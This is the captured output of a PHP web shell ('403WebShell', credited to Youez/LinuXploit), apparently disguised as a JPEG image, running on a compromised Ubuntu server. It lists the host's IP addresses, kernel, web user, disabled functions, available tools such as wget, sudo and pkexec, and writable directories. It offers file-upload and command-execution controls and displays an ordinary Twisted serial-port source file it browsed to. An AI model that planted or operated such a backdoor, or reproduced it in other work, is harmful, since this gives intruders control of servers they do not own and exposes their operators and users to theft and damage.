����JFIF��H�H����Exif��MM�*���� ��3����V�����3������3�(��������������������3�����403WebShell
403Webshell
Server IP : 74.208.127.88  /  Your IP : 18.221.40.13
Web Server : Apache/2.4.41 (Ubuntu)
System : Linux ubuntu 5.4.0-163-generic #180-Ubuntu SMP Tue Sep 5 13:21:23 UTC 2023 x86_64
User : www-data ( 33)
PHP Version : 7.4.3-4ubuntu2.29
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /proc/self/root/usr/lib/python3/dist-packages/twisted/internet/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /proc/self/root/usr/lib/python3/dist-packages/twisted/internet/_win32serialport.py
# -*- test-case-name: twisted.internet.test.test_win32serialport -*-

# Copyright (c) Twisted Matrix Laboratories.
# See LICENSE for details.

"""
Serial port support for Windows.

Requires PySerial and pywin32.
"""

from __future__ import division, absolute_import

# system imports
from serial import PARITY_NONE
from serial import STOPBITS_ONE
from serial import EIGHTBITS
from serial.serialutil import to_bytes
import win32file, win32event

# twisted imports
from twisted.internet import abstract

# sibling imports
from twisted.internet.serialport import BaseSerialPort


class SerialPort(BaseSerialPort, abstract.FileDescriptor):
    """A serial device, acting as a transport, that uses a win32 event."""

    connected = 1

    def __init__(self, protocol, deviceNameOrPortNumber, reactor, 
        baudrate = 9600, bytesize = EIGHTBITS, parity = PARITY_NONE,
        stopbits = STOPBITS_ONE, xonxoff = 0, rtscts = 0):
        self._serial = self._serialFactory(
            deviceNameOrPortNumber, baudrate=baudrate, bytesize=bytesize,
            parity=parity, stopbits=stopbits, timeout=None,
            xonxoff=xonxoff, rtscts=rtscts)
        self.flushInput()
        self.flushOutput()
        self.reactor = reactor
        self.protocol = protocol
        self.outQueue = []
        self.closed = 0
        self.closedNotifies = 0
        self.writeInProgress = 0

        self.protocol = protocol
        self._overlappedRead = win32file.OVERLAPPED()
        self._overlappedRead.hEvent = win32event.CreateEvent(None, 1, 0, None)
        self._overlappedWrite = win32file.OVERLAPPED()
        self._overlappedWrite.hEvent = win32event.CreateEvent(None, 0, 0, None)

        self.reactor.addEvent(self._overlappedRead.hEvent, self, 'serialReadEvent')
        self.reactor.addEvent(self._overlappedWrite.hEvent, self, 'serialWriteEvent')

        self.protocol.makeConnection(self)
        self._finishPortSetup()


    def _finishPortSetup(self):
        """
        Finish setting up the serial port.

        This is a separate method to facilitate testing.
        """
        flags, comstat = self._clearCommError()
        rc, self.read_buf = win32file.ReadFile(self._serial._port_handle,
                                               win32file.AllocateReadBuffer(1),
                                               self._overlappedRead)


    def _clearCommError(self):
        return win32file.ClearCommError(self._serial._port_handle)


    def serialReadEvent(self):
        #get that character we set up
        n = win32file.GetOverlappedResult(self._serial._port_handle, self._overlappedRead, 0)
        first = to_bytes(self.read_buf[:n])
        #now we should get everything that is already in the buffer
        flags, comstat = self._clearCommError()
        if comstat.cbInQue:
            win32event.ResetEvent(self._overlappedRead.hEvent)
            rc, buf = win32file.ReadFile(self._serial._port_handle,
                                         win32file.AllocateReadBuffer(comstat.cbInQue),
                                         self._overlappedRead)
            n = win32file.GetOverlappedResult(self._serial._port_handle, self._overlappedRead, 1)
            #handle all the received data:
            self.protocol.dataReceived(first + to_bytes(buf[:n]))
        else:
            #handle all the received data:
            self.protocol.dataReceived(first)

        #set up next one
        win32event.ResetEvent(self._overlappedRead.hEvent)
        rc, self.read_buf = win32file.ReadFile(self._serial._port_handle,
                                               win32file.AllocateReadBuffer(1),
                                               self._overlappedRead)


    def write(self, data):
        if data:
            if self.writeInProgress:
                self.outQueue.append(data)
            else:
                self.writeInProgress = 1
                win32file.WriteFile(self._serial._port_handle, data, self._overlappedWrite)


    def serialWriteEvent(self):
        try:
            dataToWrite = self.outQueue.pop(0)
        except IndexError:
            self.writeInProgress = 0
            return
        else:
            win32file.WriteFile(self._serial._port_handle, dataToWrite, self._overlappedWrite)


    def connectionLost(self, reason):
        """
        Called when the serial port disconnects.

        Will call C{connectionLost} on the protocol that is handling the
        serial data.
        """
        self.reactor.removeEvent(self._overlappedRead.hEvent)
        self.reactor.removeEvent(self._overlappedWrite.hEvent)
        abstract.FileDescriptor.connectionLost(self, reason)
        self._serial.close()
        self.protocol.connectionLost(reason)

Youez - 2016 - github.com/yon3zu
LinuXploit